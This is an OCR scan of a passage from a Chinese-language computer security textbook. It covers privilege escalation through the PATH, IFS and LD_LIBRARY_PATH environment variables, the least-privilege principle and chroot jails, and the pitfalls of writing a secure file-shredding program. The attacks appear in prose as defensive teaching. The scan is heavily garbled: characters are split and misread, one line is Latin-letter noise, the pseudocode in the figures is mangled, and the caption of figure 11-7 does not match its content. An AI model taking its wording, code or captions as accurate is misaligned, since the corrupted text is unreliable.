们 在 11.3 节 中 讨论 的 共享 内 存 访问 管理 的 一 个 一 般 化 问题 。 许 多 类 似 的 问题 都 需要 恰当 的 同 
步 机 制 。 

现在 我 们 就 详细 讨论 上 面 的 这 些 问 题 。 


11.4.1 ”环境 变量 


环境 变量 (environment variable) 是 每 个 进程 从 其 父 进 程 中 继承 的 能 够 影响 进程 运行 方式 
的 一 系列 字符 串 值 。 操 作 系 统 在 构造 进程 的 内 存 空 间 时 ， 将 这 些 信 息 包含 其 中 。 默 认 情 况 下 ， 
进程 拷贝 父 进程 的 环境 变量 值 。 然 而 ， 执 行 新 程序 的 请 求 可 以 指定 使 用 一 系列 新 值 。 程 序 可 以 
在 任何 时 候 修 改进 程 的 环境 变量 ， 这 些 修改 依次 传递 给 进程 所 产生 的 子 进 程 。 一 些 环境 变量 名 
为 大 家 所 熟知 ， 它 们 被 很 多 程序 和 操作 系统 使 用 。 还 有 其 他 一 些 环 境 变 量 是 程序 自 定义 的 。 环 
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境 变量 在 很 多 操作 系统 中 被 使 用 ， 包 括 UNIX RHA., DOS, Microsoft Windows 和 其 他 系统 。 

常见 的 环境 变量 包括 : PATH， 它 指定 搜索 任何 给 定 命令 的 目录 集合 ; IFS， 它 指定 shell 
脚本 中 使 用 的 字 边 界 ，LD LIBRARY PATH， 指 定 动态 可 加 载 库 的 搜索 目录 列表 。 所 有 这 些 环 
境 变量 都 已 被 用 来 攻击 程序 。 

程序 的 安全 顾虑 在 于 这 些 环境 变量 提供 的 可 以 进入 一 个 程序 的 另 一 个 路 径 是 未 确认 的 数 
据 ， 因 而 需要 进行 验证 。 在 一 次 攻击 中 ,计算 机 系统 的 本 地 用 户 经 常 利用 这 些 环境 变量 获取 对 
系统 的 更 大 权限 。 他 们 的 目标 是 通过 攻击 一 个 程序 获得 超级 用 户 或 者 管理 员 的 权限 ， 然 后 利用 
这 些 最 高 的 权限 执行 设计 的 攻击 代码 。 

一 些 早期 的 攻击 是 使 用 环境 变量 去 攻击 shell 脚本 ， 这 些 脚本 以 其 所 有 者 的 权限 而 不 是 以 
正在 运行 它们 的 用 户 的 权限 在 执行 。 考 虑 图 11-6a 中 给 出 的 简单 脚本 。 一 个 ISP 可 能 使 用 这 段 
脚本 ， 获 取 一 些 用 户 的 身份 ， 如 果 其 中 包含 的 域 信息 被 去 除 ， 那 么 接着 就 能 获取 和 该 用 户 对 应 
的 IP 地 址 。 由 于 该 信息 保存 在 需要 特权 才能 访问 的 用 户 账户 信息 目录 中 ， 针 对 该 目录 的 一 般 
访问 是 被 不 允许 的 。 而 这 段 脚本 以 其 所 有 者 的 权限 运行 ， 对 上 述 相关 目录 具有 访问 权限 。 这 种 
类 型 的 简单 脚本 在 很 多 系统 上 都 很 常见 。 然 而 ， 它 包含 大 量 的 严重 缺陷 。 第 一 个 缺陷 涉及 与 环 
境 变 量 PATH 的 交互 。 这 有 段 简单 的 脚本 调用 两 个 不 同 的 程序 .sed 和 grep。 和 程序 员 假设 这 两 个 
程序 的 标准 系统 版 本 会 被 调用 。 但 此 处 只 是 指定 了 文件 名 。 为 了 找到 具体 的 程序 ，shell 将 到 
PATH 变量 指定 的 目录 中 查找 对 应 的 文件 名 。 攻 击 者 只 需要 简单 地 重 定义 变量 PATH， 使 其 包 
含 攻击 者 控制 的 目录 ， 比 如 该 目录 中 包含 一 个 grep 程序 。 当 脚本 运行 时 ， 攻 击 者 的 程序 grep 
代替 程序 的 标准 系统 版 本 被 调用 。 这 样 这 个 程序 就 可 以 按照 攻击 者 的 意愿 做 任何 事 ， 因 为 它 具 
有 shell 脚本 所 具有 的 权限 。 为 了 消除 这 个 漏洞 ， 该 脚本 可 以 改 为 对 每 个 程序 都 使 用 其 绝对 路 
径 名 。 这 样 可 以 避免 变量 PATH 的 使 用 ， 但 是 这 会 使 脚本 的 可 读 性 和 可 移植 性 丧失 。 或 者 ， 变 
量 PATH 可 以 被 重 设 为 脚本 已 知 的 默认 值 ， 如 图 11-6b 所 示 。 不 幸 的 是 ， 这 个 版 本 的 脚本 程序 
也 还 有 漏洞 ， 这 次 是 因为 IFS 环境 变量 。 该 变量 被 用 来 区 分 一 行 命令 中 的 不 同 单词 。 默 认 情 况 
下 为 空格 、 制 表 符 或 换行 符 。 然 而 ， 可 以 将 它 设 置 成 任意 的 字符 序列 。 我 们 考虑 在 该 集合 中 包 
含 “ 王 ”的 影响 。 接 下 来 给 变量 PATH 赋 一 个 新 值 被 解释 成 执行 程序 PATH 的 命令 ， 而 后 面 的 

目录 列表 被 视 为 程序 参数 。 如 果 攻 击 者 也 修改 变量 PATH 加 入 了 包含 攻击 程序 PATH 的 目录 ， 
那么 当 脚 本 运行 时 ， 攻 击 程序 就 会 被 执行 。 从 本 质 上 讲 ， 我们 无 法 避免 这 种 类 型 的 针对 shell 
脚本 的 攻击 。 在 最 坏 的 情况 下 ， 如 果 脚 本 以 root 用 户 的 身份 执行 ， 那 么 对 整个 系统 的 破坏 也 
是 可 能 的 。 目 前 的 一 些 UNIX 系统 已 经 阻止 对 一 些 关键 环境 变量 的 设置 ， 比 如 以 root 用 户 身 
份 运行 的 程序 中 使 用 的 环境 变量 。 然 而 ， 这 并 不 能 阻止 对 以 其 他 用 户 身份 运行 的 程序 的 攻击 ， 
因此 攻击 者 还 是 可 能 获取 对 系统 的 更 高 访问 权限 。 


[bin7Dpash oy 
PATH=" /sbin:. 
export PATH 
usere echo $1 





b) (改进 后 的 ) 仍 存 在 漏洞 的 特权 shell 脚本 
图 11-6 “存在 漏洞 的 shell 脚本 


一 般 来 讲 ， 编 写 安 全 的 、 高 优先 级 的 shell 脚本 是 很 困难 的 。 因 而 ,我 们 并 不 推荐 使 用 
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shell 脚本 。 我 们 建议 最 好 修改 组 身份 (group identity) 而 不 是 用 户 身 份 (user identity)， 并 将 所 有 


的 关键 环境 变量 重新 设置 。 这 至 少 保 证 攻击 者 不 会 获取 超级 用 户 权限 。 如 果 需 要 一 个 脚本 应 用 
程序 ， 最 好 的 解决 方法 是 使 用 一 个 编译 过 的 包装 函数 ( wrapper function) 调用 它 。 在 调用 脚本 程序 
前 ， 用 一 个 编译 好 的 程序 构建 一 个 相对 安全 的 环境 变量 集合 ， 然 后 使 用 该 程序 完成 属 主 或 组 的 改 
变 。 如 果 上 述 过 程 正确 实现 的 话 ， 这 就 提供 了 一 个 安全 执行 此 类 脚本 的 机 制 。 目 前 这 种 方法 的 使 
用 已 经 有 了 很 好 的 典范 ， 在 Apache Web 服务 器 上 执行 用 户 CGI 脚本 时 使 用 了 包装 函数 suexec, 
这 个 包装 函数 在 构建 一 个 安全 的 环境 并 执行 指定 脚本 之 前 完成 了 一 系列 周密 的 安全 检查 。 

尽管 以 高 优先 级 运行 的 是 编译 过 的 程序 ， 但 是 攻击 者 仍然 可 能 利用 环境 变量 进行 攻击 。 
如 果 这 个 程序 执行 男 一 个 程序 ， 依 据 执行 时 使 用 的 命令 ， 变 量 PATH 仍然 能 被 用 于 寻找 将 要 
执行 的 程序 。 因 而 ， 所 有 这 类 程序 必须 首先 将 其 重 设 为 已 知 的 安全 值 。 至 少 这 个 工作 可 以 安 
全 地 完成 。 然 而 ， 在 这 个 过 程 中 还 有 其 他 的 漏洞 存在 。 从 根本 上 讲 ， 在 现代 操作 系统 上 ， 所 
有 的 程序 都 使 用 标准 库 例 程 提 供 的 功能 。 当 程序 被 编译 和 链接 的 时 候 ， 标 准 库 中 的 代码 被 加 
载 到 可 执行 程序 文件 中 ， 这 被 称 为 静态 链接 。 使 用 静态 链接 ， 每 个 程序 将 它 自己 对 这 些 标准 
库 的 拷贝 装载 到 计算 机 的 内 存 中 。 这 是 非常 浪费 资源 的 ， 因 为 所 有 拷贝 都 是 相同 的 。 因 此 ， 
大 多 数 现 代 操作 系统 都 支持 动态 链接 的 概念 。 一 个 动态 链接 的 可 执行 程序 并 不 包含 这 些 公共 
库 中 的 代码 ， 而 是 包含 一 个 表 ， 其 中 包含 所 需 使 用 的 所 有 函数 的 名 字 和 指向 该 函数 的 指针 。 
当 程 序 被 装载 到 一 个 进程 时 ， 该 表 可 以 解决 对 任何 库 的 一 个 单一 拷贝 的 引用 ， 而 这 个 拷贝 为 
所 有 需要 它 的 进程 所 共享 。 然 而 ， 不 同 的 程序 有 时 可 能 需要 使 用 不 同 版 本 的 函数 库 中 同名 的 
库 了 清 数 。 因 而 ,通常 存在 一 种 方法 指定 一 个 目录 列表 来 动态 查找 已 加 载 的 库 。 在 很 多 UNIX 
系统 上 ， 这 是 环境 变量 LD LIBRARY PATH 的 功能 。 该 变量 的 使 用 对 动态 库 的 使 用 提供 了 
一 定 的 灵活 度 。 但 同样 它 也 引入 了 一 些 可 能 的 攻击 机 制 。 攻 击 者 构造 一 个 通用 库 的 自 定义 版 
本 ， 将 已 知 的 、 当 程序 执行 时 能 被 动态 链接 的 库 图 数 的 代码 替换 成 攻击 代码 。 通 过 设置 变量 
LD_LIBRARY PATH， 程序 将 首先 引用 含有 攻击 代码 版 本 的 库 图 数 ， 当 程序 执行 的 时 候 调 
用 该 库 函 数 ， 攻 击 代 码 就 会 利用 目标 程序 的 特权 运行 。 为 了 避免 这 类 攻击 ， 程 序 员 可 以 对 可 
执行 程序 进行 静态 链接 ， 但 是 付出 的 代价 是 内 存 利用 率 不 高 。 另 外 ， 也 有 一 些 操作 系统 ， 当 
程序 以 不 同 优先 级 执行 时 ， 不 允许 使 用 这 个 环境 变量 。 

最 后 ， 除 了 使 用 标准 环境 变量 外 ， 很 多 程序 还 使 用 自 定 义 变量 ， 人 允许 用 户 在 启动 startup) 
脚本 中 通过 为 这 些 变量 设置 不 同 的 值 来 改变 程序 的 行为 。 同 样 ， 这 样 的 用 法 意味 着 这 些 变 量 也 
会 给 程序 引入 不 可 信 的 输入 ， 因 而 程序 还 是 需要 进行 验证 。 将 这 些 变量 的 值 和 其 他 信息 进行 合 
并 后 放 到 缓冲 区 中 可 能 还 会 发 生 一 个 特定 的 危险 。 如 果 程 序 员 不 小 心 ， 就 会 出 现 缓冲 区 溢出 ， 
这 会 带 来 像 我 们 在 第 10 章 中 讨论 的 那样 的 后 果 。 另 外 ， 像 我 们 在 11.2 节 中 讨论 的 那样 ， 在 对 
文本 信息 正确 解释 的 过 程 中 所 出 现 的 问题 在 此 也 可 能 出 现 。 

所 有 这 些 例子 表明 ， 我 们 要 仔细 地 识别 程序 与 它 执 行 时 所 处 的 系统 的 交互 方式 ， 仔 细 考 虑 
这 些 假 设 中 的 安全 隐患 。 


11.4.2 ”使 用 合适 的 最 小 特权 


在 这 一 章 和 第 10 章 中 ， 我 们 讨论 了 很 多 程序 的 漏洞 ， 由 此 造成 的 后 果 是 攻击 者 能 够 利用 
受到 攻击 的 程序 或 服务 的 特权 和 访问 权限 来 执行 代码 。 如 果 这 些 特权 比 本 来 为 攻击 者 分 配 的 权 
限 高 ， 就 会 导致 特权 扩大 (privilege escalation)， 在 攻击 过 程 中 ， 这 是 很 重要 的 一 步 。 拥 有 更 
高 级 别 的 特权 可 能 导致 攻击 者 修改 系统 ， 保 证 攻击 者 以 后 仍 能 使 用 这 些 需 要 较 高 特权 的 程序 。 
因此 我 们 强烈 建议 每 个 程序 都 应 该 使 用 完成 其 功能 所 需 的 最 小 特权 。 这 就 是 最 小 特权 (least 
privilege) 原则 ， 人 们 已 经 普遍 认识 到 它 是 安全 程序 的 一 个 理想 特性 。 
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正常 情况 下 ， 当 用 户 运行 一 个 程序 的 时 候 ， 该 程序 应 该 和 用 户 具 有 相同 的 优先 级 和 访问 
权限 。 利 用 这 些 程序 的 漏洞 并 不 能 使 攻击 者 在 优先 级 方面 有 什么 收获 ， 尽 管 攻击 者 可 能 还 有 其 
他 目的 ， 比 如 对 程序 进行 拒绝 服务 攻击 。 然 而 ,很 多 情况 下 ， 程 序 需 要 使 用 一 些 该 用 户 未 被 授 
权 访 问 的 资源 。 这 可 能 通过 提供 一 个 标准 系统 机 制 支持 的 更 细 的 访问 控制 粒度 来 完成 。 通 常 的 
做 法 是 对 一 个 服务 采用 一 个 专门 的 系统 登录 ， 并 且 仅 登录 者 可 以 访问 该 服务 所 使 用 的 目录 和 文 
件 。 实 现 该 服务 的 任何 一 个 程序 都 使 用 系统 用 户 的 访问 权限 运行 ， 这 样 的 程序 被 视 为 特权 程 
序 。 不 同 的 操作 系统 提供 不 同 的 机 制 支持 这 个 概念 。UNIX 系统 使 用 set user 或 set group 选项 。 
Windows 系统 中 使 用 的 访问 列表 提供 一 种 机 制 ， 在 需要 的 情况 下 可 以 指定 可 选 的 用 户 或 组 的 访 
问 权限 。 我 们 在 第 4 章 中 深入 讨论 过 这 些 访问 控制 的 概念 。 

无 论 何 时 ， 当 特权 程序 运行 时 ， 我 们 必须 仔细 确定 合适 的 用 户 和 组 所 需 的 优先 级 。 任 何 
这 样 的 程序 ， 都 是 想 获 得 额外 优先 权 的 攻击 者 的 潜在 目标 ， 正 如 我 们 前 面 讨论 环境 变量 和 特权 
shell 脚本 的 安全 时 所 担心 的 。 一 个 关键 决策 是 在 提高 组 优先 级 的 同时 也 提高 用 户 优先 级 ， 还 
是 仅仅 提高 组 优先 级 。 如 果 可 以 的 话 ， 后 者 更 合适 。 这 是 因为 在 UNIX 和 其 相关 的 系统 上 ， 被 
创建 的 任何 文件 都 将 运行 程序 的 用 户 作 为 文件 的 属 主 ， 这 能 够 使 用 户 更 容易 被 识别 。 如 果 附 加 
的 特殊 用 户 优 先 权 被 授权 ， 这 个 特殊 用 户 就 是 任何 新 创建 文件 的 属 主 ， 而 掩盖 了 运行 程序 的 用 
户 的 身份 。 然 而 ， 有 些 情况 仅仅 提高 组 访问 优先 权 并 不 能 满足 要 求 。 在 这 些 情况 下 ， 程序 员 需 
要 仔细 管理 这 些 程序 的 使 用 ， 如 果 有 必要 可 以 记录 日 志 。 

另 一 个 需要 关心 的 问题 是 保证 任何 特权 程序 仅 能 修改 所 需 的 文件 和 目录 。 很 多 特权 程序 存 
在 不 足 ， 对 所 有 相关 的 文件 和 目录 都 有 所 有 权 。 一 旦 程序 受到 攻击 ， 攻 击 者 就 可 能 拥有 更 大 的 
权限 来 修改 和 损坏 系统 。 这 有 悖 于 最 小 特权 原则 ， 例 如 在 很 多 Web 服务 器 和 它们 的 文档 目录 
的 配置 中 都 存在 这 个 不 足 。 在 大 部 分 系统 上 ，Web 服务 器 利用 一 个 特殊 用 户 的 特权 运行 ， 一 
般 是 WWW 或 类 似 的 用 户 。 通 常 Web 服务 器 对 正在 提供 服务 的 文件 仅 需 要 读 的 能 力 。 它 需要 
写 访问 的 文件 ， 用 来 存储 那些 由 CGI 脚本 、 文 件 上 传 等 提供 的 信息 。 其 他 所 有 文件 应 该 对 管 
理 它们 的 用 户 组 有 具有 写 权 限 ， 而 不 是 对 Web 服务 器 。 然 而 ， 一 个 安全 意识 不 强 的 系统 管理 者 ， 
常常 将 Web 文档 体系 中 大 多 数 文 件 的 所 有 权 分 配给 Web 服务 器 。 如 果 Web 服务 器 受到 威胁 ， 
攻击 者 就 可 能 修改 大 多 数 文件 。 广 泛 发 生 的 Web 毁坏 (defacement) 攻击 就 有 类 似 的 后 果 。 服 
务 右 通常 受到 11.2 节 中 介绍 的 PHP 远程 代码 注入 攻击 的 威胁 。 这 种 攻击 使 得 攻击 者 能 以 Web 
服务 器 的 优先 级 运行 任何 选择 好 的 PHP 代码 。 攻 击 者 也 能 替换 服务 第 拥有 写 权 限 的 那些 页 面 。 
如 果 攻 击 者 访问 或 修改 以 前 的 CGI 脚本 用 户 保存 的 表格 数据 ， 就 会 导致 更 严重 的 后 果 。 

给 特权 程序 管理 的 文件 和 目录 分 配 正确 的 文件 和 组 所 有 权时 ， 要 格外 小 心 。 特 别 是 当 程 序 
从 一 个 计算 机 系统 转移 到 另 一 个 系统 中 ， 或 者 操作 系统 进行 大 的 更 新 时 ， 可 能 会 出 现 问 题 。 新 
的 系统 可 能 会 对 这 些 用 户 和 组 采用 不 同 的 默认 值 。 如 果 相 关 的 程序 、 文 件 和 目录 并 没有 被 完全 
正确 地 更 新 ， 那 么 就 不 能 像 所 期 望 的 那样 提供 服务 ， 或 者 服务 可 以 访问 它 不 应 该 访问 的 文件 ， 
从 而 导致 文件 受到 破坏 。 当 将 Web 服务 器 移动 到 一 个 新 的 不 同 的 系统 上 时 ，Web AR aR 
可 能 从 www 换 成 www-data， 这 时 也 会 发 生 类 似 的 安全 问题 。 受 到 影响 的 文件 可 能 不 仅 是 主 
Web 服务 器 文 档 体系 中 的 文件 ， 还 可 以 是 用 户 公共 Web 目录 中 的 文件 。 

和 特权 程序 相关 的 最 大 的 安全 问题 ， 出 现在 程序 以 root 或 者 管理 员 权 限 运 行 的 时 候 。 这 
时 该 程序 对 系统 拥有 很 高 的 访问 和 控制 权限 。 获 取 这 样 的 权限 正 是 系统 攻击 者 的 主要 目的 ， 因 
而 这 些 特权 程序 也 成 了 攻击 者 的 主要 目标 。 最 小 特权 原则 要 求 访问 权限 应 该 尽 可 能 地 小 ， 时 间 
也 应 尽 可 能 地 短 。 不 幸 的 是 ， 由 于 操作 系统 本 身 的 设计 ， 以 及 限制 基础 系统 资源 访问 的 需要 ， 
在 有 些 情况 下 ， 这 些 访问 必须 被 授权 。 这 方面 比较 经 典 的 例子 包括 允许 用 户 登 录 或 改变 系统 密 
码 的 程序 ， 这 些 程序 仅 root 用 户 可 以 访问 。 另 一 个 常见 的 例子 ， 是 需要 绑 定 一 个 特权 服务 端 
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口 的 网 络 服务 程序 。 比 如 Web, Z£ shell (SSH), SMTP 邮件 投递 程序 和 DNS 等 很 多 其 他 
服务 程序 。 一 般 而 言 ， 这 些 服务 程序 在 运行 期 间 都 一 直 拥 有 root 用 户 权 限 。 如 果 对 其 特权 进 
行进 一 步 的 考查 ， 我 们 发 现 只 需要 在 初始 时 将 root 用 户 权 限 绑 定 到 需要 的 特权 端口 上 。 一 旦 
完成 这 个 工作 ， 服 务 器 程序 就 可 以 将 用 户 的 特权 减少 为 男 一 个 特殊 的 系统 用 户 的 特权 ， 这 样 随 
后 的 攻击 所 造成 的 危害 就 小 多 了 。 以 前 广泛 使 用 的 sendmail 邮件 投递 程序 存在 大 量 的 安全 漏 
洞 ， 原 因 就 在 于 这 个 复杂 的 程序 目 始 至 终 都 以 root 用 户 权 限 运 行 。 

现在 我 们 考虑 良好 的 防御 性 程序 设计 准则 ， 大 的 复杂 程序 应 尽量 分 解 成 小 模块 ， 每 个 
模块 仅 在 需要 的 时 候 拥 有 相应 的 访问 权限 。 这 种 程序 的 模块 化 设计 思路 使 得 模块 间 的 隔离 度 
(degree of isolation) 更 大 ， 也 降低 了 在 一 个 组 件 中 的 安全 问题 的 影响 范围 。 另 外 ， 由 于 模块 比 
较 小 ， 每 个 模块 更 易于 测试 和 验证 。 理 想 情 况 下 ， 需 要 高 优先 级 的 少数 组 件 可 以 保持 短小 的 模 
式 ， 相 对 于 程序 的 其 他 部 分 它们 需要 受到 更 加 详细 的 审查 。 很 多 机 构 使 用 的 sendmail 邮件 投 
递 程 序 现在 已 经 被 postfix 邮件 投递 程序 代替 ， 部 分 原因 是 postfix 邮件 投递 程序 采用 了 这 些 更 
安全 的 设计 准则 。 

最 小 化 特权 的 更 进一步 技术 ， 是 在 一 个 特定 分 隅 出 的 与 文件 系统 隔离 的 区 域内 运行 存在 洪 
在 漏洞 的 程序 。UNIX 及 其 相关 系统 提供 了 系统 函数 chroot， 这 个 函数 将 程序 的 文件 系统 视图 
限制 在 一 个 仔细 配置 的 区 域内 ， 这 就 是 chroot jail。 在 chroot jail 被 正确 配置 的 情况 下 ， 尽 管 程 
序 受 到 威胁 ， 但 它 仅 可 以 访问 或 修改 chroot jail 区 域内 的 文件 。 不 幸 的 是 ， 对 chroot jail 进行 
正确 配置 是 相当 困难 的 。 如 果 配 置 不 正确 ， 程 序 可 能 运行 失败 ， 或 者 出 现 更 坏 的 情况 ， 就 是 攻 
击 者 仍然 可 能 同 jail 外 的 文件 进行 交互 。chroot jail 的 使 用 可 以 限制 文件 受到 破坏 的 程度 ， 但 它 
并 不 适用 于 所 有 的 情况 ， 也 不 是 完全 的 安全 解决 方案 。 最 新 开发 的 另 一 种 替代 方法 就 是 使 用 容 
需 ， 也 被 称 为 应 用 程序 虚拟 化 ， 我 们 后 续 将 在 12.8 节 进 行 讨论 。 


11.4.3 ”系统 调用 和 标准 库 函 数 


除了 很 小 的 符 入 式 系统 ， 没 有 计算 机 程序 可 以 包含 它 执 行 时 所 需要 的 全 部 代码 。 程 序 通过 
操作 系统 调用 来 使 用 系统 资源 ， 通 过 调用 标准 库 遇 数 完成 通常 的 操作 。 在 使 用 这 些 函 数 时 ， 程 
序 员 通 常 假设 这 些 困 数 能 够 按照 预期 正常 运行 。 大 多 数 情况 下 这 些 函 数 的 确 是 如 所 期 望 的 那样 
运行 ， 但 在 程序 员 对 这 些 函 数 做 出 的 假设 不 正确 时 ， 会 出 现 一些 问 题 ， 造 成 程序 没有 按照 其 所 
期 望 的 那样 执行 。 造 成 这 种 情况 的 部 分 原因 在 于 程序 员 的 注意 力 更 多 地 集中 在 他 自己 所 开发 的 
程序 上 ， 没 有 注意 与 环境 的 联系 。 然 而 ， 更 多 情况 下 ， 这 个 程序 只 是 运行 并 使 用 可 用 系统 资源 
的 众多 程序 中 的 一 个 。 操 作 系统 和 库 函 数 的 作用 是 管理 资源 ， 目 标 是 为 在 系统 上 运行 的 程序 提 
供 最 好 的 性 能 。 这 使 得 服务 请 求 可 以 通过 缓存 、 重 新 排序 或 其 他 的 修改 对 系统 的 使 用 进行 优 
化 。 不 幸 的 是 ， 有 时 系统 优化 与 程序 的 目标 会 产生 冲突 。 除 非 程序 员 了 解 它们 彼此 间 的 相互 作 
用 关系 ， 清 楚 如 何 通过 编码 解决 这 些 问题 ， 否 则 程序 不 会 按照 其 预期 的 目标 执行 。 

Venema 在 有 关 设 计 安 全 的 文件 粉碎 (file shredding) 程序 的 讨论 中 ， 提 供 了 一 个 非常 好 的 
说 明 [VENE06]。 安 全 的 文件 粉碎 是 指 删除 一 个 文件 后 其 内 容 不 能 恢复 。 仅 使 用 标准 文件 删除 
应 用 程序 或 者 系统 调用 是 不 够 的 ， 因 为 这 仅 是 将 文件 名 与 内 容 的 链接 进行 了 删除 ， 而 文件 内 容 
仍然 存在 于 硬盘 中 ， 这 些 内 容 块 还 可 能 被 其 他 的 文件 重新 使 用 。 删 除 操作 的 逆 操 作 是 很 简单 
的 ， 因 为 撤销 删除 (undelete) 程序 已 经 使 用 很 多 年 了 。 即 使 删除 的 文件 内 容 块 被 再 利用 ， 文 件 
中 的 数据 仍 可 能 恢复 ， 因 为 并 非 所 有 先前 的 位 值 (bit value) 踪迹 都 被 删除 [GUTM96]。 因 此 ， 


日 ”特权 网 络 服务 使 用 的 端口 数目 少 于 1024 个 。 在 UNIX 和 相关 的 系统 中 只 有 root 用 户 被 赋予 绑 定 这 些 端 口 的 
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我 们 建议 利用 多 个 不 同 的 位 模式 (bit pattern) 反复 履 盖 数据 内 容 ， 使 得 与 原来 的 数据 具有 较 大 
的 差异 。 因 此 ， 一 个 好 的 文件 粉碎 程序 可 以 实现 如 图 11-7a 所 示 的 算法 。 然 而 ， 即 使 该 算法 得 
到 非常 好 的 实现 ， 文 件 内 容 还 会 被 恢复 。Venema 详细 指出 了 算法 中 存在 的 缺陷 ， 这 些 缺 陷 是 
导致 程序 不 能 像 所 期 望 的 那样 执行 的 原因 。 这 些 缺 陷 与 一 些 错误 的 假设 有 关 ， 假 设 的 内 容 是 关 
于 相关 的 系统 男 数 如 何 操作 ， 主 要 的 缺陷 包括 : 


在 文件 以 写 的 方式 打开 时 ， 系 统 需要 将 新 的 数据 当 作 原来 的 数据 写 到 相同 的 磁盘 块 。 
在 实现 过 程 中 ， 操 作 系统 假设 原来 的 数据 不 绸 需要 ， 它 删除 这 些 数 据 与 文件 的 关联 ， 
将 新 的 没有 使 用 的 块 分 配给 需要 写 人 的 数据 。 这 时 程序 需要 做 的 是 ， 打 开 需 要 修改 的 
文件 ， 告 知 操作 系统 原来 的 数据 仍然 需要 。 

当 文 件 被 某 个 样本 覆盖 的 时 候 ， 数 据 立 即 写 入 便 盘 。 第 一 步 是 将 数据 拷贝 到 一 个 应 用 
程序 的 缓冲 区 中 ， 由 标准 库 文件 IO 例 程 管理 。 这 些 例 程控 制 着 缓冲 区 的 写 人 ， 直 到 
缓冲 区 充满 之 后 ， 程 序 刷新 缓冲 区 ， 或 者 关闭 文件 。 如 果 文 件 比 较 小 ， 在 程序 循环 执 
行 、 返 回 到 文件 的 开始 以 及 写 入 新 的 样本 之 前 缓冲 区 不 会 充满 。 在 这 种 情况 下 ， 库 代 
码 决定 没有 必要 再 向 硬盘 写 数据 ， 因 为 以 前 写 入 的 数据 已 经 使 文件 发 生 了 变化 。 程 序 
需要 明确 做 到 在 写 人 一 个 样本 之 后 ， 必 须 刷 新 缓冲 区 。 

当 刷 新 IO 缓冲 区 以 及 关闭 文件 的 时 候 ， 数 据 被 写 人 硬盘 。 然 而， 在 操作 系统 的 文件 
处 理 代码 中 还 有 为 外 一 层 缓 冲 ， 这 一 层 缓冲 区 存储 在 操作 系统 上 当前 正在 运行 的 所 有 
进程 读 写 文件 的 信息 ， 它 对 这 些 读 写 的 数据 进行 重组 或 调度 ,使 其 更 利于 物理 设备 的 
高 效 访问 。 即 使 程序 把 来 自 应 用 程序 的 缓冲 区 的 数据 刷新 到 文件 系统 的 缓冲 区 ， 数据 
将 不 会 被 立即 写 入 。 如 果 新 的 替代 数据 被 刷新 ， 它 们 很 可 能 再 次 蔡 代 原来 未 被 写 入 磁 
盘 的 数据 ， 因 为 文件 系统 代码 将 假设 早先 的 值 不 再 需要 ， 而 且 该 替代 数据 也 可 能 没有 
被 写 人 硬盘 。 因 此 程序 必须 强制 文件 系统 中 的 数据 与 设备 上 的 值 同步 ， 才 能 确保 数据 
被 实际 地 传送 到 设备 上 上。 然而， 这样 的 结果 将 导致 系统 性 能 降低 ， 因 为 它 使 设备 访问 
次 数 增加 。 这 种 代价 不 只 反映 在 文件 粉碎 程序 ， 而 是 当前 运行 在 系统 上 的 所 有 程序 。 


针对 这 些 变化 ， 我 们 将 安全 文件 粉碎 程序 算法 调整 为 如 图 11-7b 所 示 的 情况 。 这 当然 更 可 
能 达到 预期 的 结果 ， 然 而 仔细 分 析 起 来 ， 还 涉及 更 多 的 问题 。 


Patterns = (20101010, 01010101, 11001100, 00110011,- 00000000, nunn, 
peed. 


SR file for writing 
for each pattern 
=~ seek to start of file 
| overwrite file contents with pater 
‘close file 
remove file 





Sa aces 


eraai n = [10101010, 01010101, 11001100, 00110011, 00000000, 11111111, 
~=] =f 
pan file for update 
for each pattern 
_ seek to start of file 


overwrite file contents with pattern 
flush application write buffers Se ; 
_ syne file Berean meite buffers with eure, | 
‘close file - Pee a oe 
| remove file | 





ee 
图 11-7 全 局 数据 洲 出 攻击 示例 
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SAR EY Fe BE IK as AA tb i a He PE tl aS, REPE ll te tPA Fb 
Bas. PRE R SO BG Eis BAI E, BATE PE hl AEP Pell Ae 
tet FETE Bl) LSC HS HY FEI UTE A. WAR ACA TF] AY IR SS UK, Pil AE 
将 丢弃 先前 的 数据 值 。 为 了 预防 该 情况 的 发 生 ， 程 序 将 采取 措施 指示 控制 器 写 这 些 处 理 中 的 数 
据 。 遗 憾 的 是 ， 各 类 操作 系统 上 并 没有 一 个 标准 的 机 制 实 现 这 种 需求 。 当 Apple 正 开 发 目 己 的 
MacOS 安全 文件 删除 程序 时 ， 又 发 现 通过 增加 一 个 额外 的 文件 控制 选项 = 来 产生 该 命令 很 有 必 
要 。 而 且 它 的 使 用 会 引起 进一步 的 性 能 代价 。 但 仍然 有 更 多 的 问题 。 如 果 设 备 不 是 磁盘 (如 内 
存 驱 动 器 )， 则 它们 的 控制 右 将 尽 可 能 地 减少 写 数 据 块 的 次 数 。 这 是 因为 这 些 设 备 只 文 持 有 限 
次 数据 块 的 写 人 操作 。 其 解决 方法 是 ， 在 数据 重 写 时 可 以 分 配 新 的 块 ， 而 不 是 重复 使 用 已 经 存 
在 的 块 。 另 外 ， 一 些 类 型 的 日 志文 件 系 统 保存 着 文件 发 生 改 变 的 所 有 记录 ， 目 的 是 在 硬盘 发 生 
损坏 时 这 些 文件 能 够 快速 恢复 。 而 且 这 些 记 录 也 能 用 于 访问 修改 前 的 数据 内 容 。 

以 上 表明 ， 写 一 个 安全 文件 粉碎 程序 的 确 非 常 困难 。 它 包括 很 多 层 的 代码 ， 每 一 层 都 假设 
对 程序 的 实际 需求 能 够 提供 最 好 的 性 能 。 当 这 些 假设 与 程序 的 目标 冲突 时 ， 程 序 将 不 再 按照 其 
所 期 望 的 执行 。 安 全 程序 员 需 要 识别 这 些 假设 ， 并 能 解决 其 与 程序 目标 的 各 种 冲突 。 由 于 识别 
相关 的 假设 可 能 非常 困难 ， 也 就 是 说 需要 穷尽 所 有 的 测试 条 件 ， 才 能 保证 程序 按照 其 所 期 望 的 
执行 。 当 程序 不 能 按 所 期 望 的 执行 时 ， 需 要 确定 造成 该 情况 的 原因 ， 识 别 无 效 的 假设 并 对 其 进 
行 修改 。 

Venema 在 其 讨论 中 总 结 到 : 事实 上 ， 程 序 可 能 正在 解决 这 种 错误 的 问题 。 在 删除 文件 前 ， 
比试 图 毁坏 文件 内 容 更 好 的 办 法 是 ， 在 文件 系统 和 交换 空间 中 覆盖 所 有 当前 没有 使 用 的 块 ， 包 
括 那 些 从 当前 删除 的 文件 中 释放 的 块 。 


11.4.4 ”阻止 共享 系统 资源 的 竞争 条 件 的 产生 


